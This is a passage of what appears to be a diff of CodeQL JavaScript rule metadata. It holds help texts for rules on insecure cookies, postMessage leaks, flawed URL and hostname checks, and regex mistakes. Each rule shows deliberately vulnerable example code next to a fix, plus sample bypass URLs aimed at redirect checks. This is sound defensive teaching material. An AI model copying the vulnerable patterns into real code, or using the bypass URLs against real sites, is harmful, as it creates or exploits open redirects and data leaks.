res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n", + "markdown" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-614", "external/cwe/cwe-311", "external/cwe/cwe-312", "external/cwe/cwe-319" ], + "description" : "Sending sensitive information in a cookie without requring SSL encryption\n can expose the cookie to an attacker.", + "id" : "js/clear-text-cookie", + "kind" : "problem", + "name" : "Clear text transmission of sensitive cookie", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/cross-window-information-leak", + "name" : "js/cross-window-information-leak", + "shortDescription" : { + "text" : "Cross-window communication with unrestricted target origin" + }, + "fullDescription" : { + "text" : "When sending sensitive information to another window using `postMessage`, the origin of the target window should be restricted to avoid unintentional information leaks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", + "markdown" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-201", "external/cwe/cwe-359" ], + "description" : "When sending sensitive information to another window using `postMessage`,\n the origin of the target window should be restricted to avoid unintentional\n information leaks.", + "id" : "js/cross-window-information-leak", + "kind" : "path-problem", + "name" : "Cross-window communication with unrestricted target origin", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "4.3" + } + }, { + "id" : "js/incomplete-url-substring-sanitization", + "name" : "js/incomplete-url-substring-sanitization", + "shortDescription" : { + "text" : "Incomplete URL substring sanitization" + }, + "fullDescription" : { + "text" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing.", + "id" : "js/incomplete-url-substring-sanitization", + "kind" : "problem", + "name" : "Incomplete URL substring sanitization", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incomplete-hostname-regexp", + "name" : "js/incomplete-hostname-regexp", + "shortDescription" : { + "text" : "Incomplete regular expression for hostnames" + }, + "fullDescription" : { + "text" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected.", + "id" : "js/incomplete-hostname-regexp", + "kind" : "problem", + "name" : "Incomplete regular expression for hostnames", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incorrect-suffix-check", + "name" : "js/incorrect-suffix-check", + "shortDescription" : { + "text" : "Incorrect suffix check" + }, + "fullDescription" : { + "text" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "security", "correctness", "external/cwe/cwe-020" ], + "description" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled.", + "id" : "js/incorrect-suffix-check", + "kind" : "problem", + "name" : "Incorrect suffix check", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/useless-regexp-character-escape", + "name" : "js/useless-regexp-character-escape", + "shortDescription" : { + "text" : "Useless regular-expression character escape" + }, + "fullDescription" : { + "text" : "Prepending a backslash to an ordinary character in a string does not have any effect, and may make regular expressions constructed from this string behave unexpectedly." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Prepending a backslash to an ordinary character in a string\n does not have any effect, and may make regular expressions constructed from this string\n behave unexpectedly.", + "id" : "js/useless-regexp-character-escape", + "kind" : "problem", + "name" : "Useless regular-expression character escape", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/overly-large-range", + "name" : "js/overly-large-range", + "shortDescription" : { + "text" : "Overly permissive regular expression range" + }, + "fullDescription" : { + "text" : "Overly permissive regular expression ranges match a wider range of characters than intended. This may allow an attacker to bypass a filter or sanitizer." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Overly permissive regular expression ranges match a wider range of characters than intended.\n This may allow an attacker to bypass a filter or sanitizer.", + "id" : "js/overly-large-range", + "kind" : "problem", + "name" : "Overly permissive regular expression range", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/incomplete-url-scheme-check", + "name" : "js/incomplete-url-scheme-check", + "shortDescription" : { + "text" : "Incomplete URL scheme check" + }, + "fullDescription" : { + "text" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\" and \"data:\" suggests a logic error or even a security vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n", + "markdown" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = 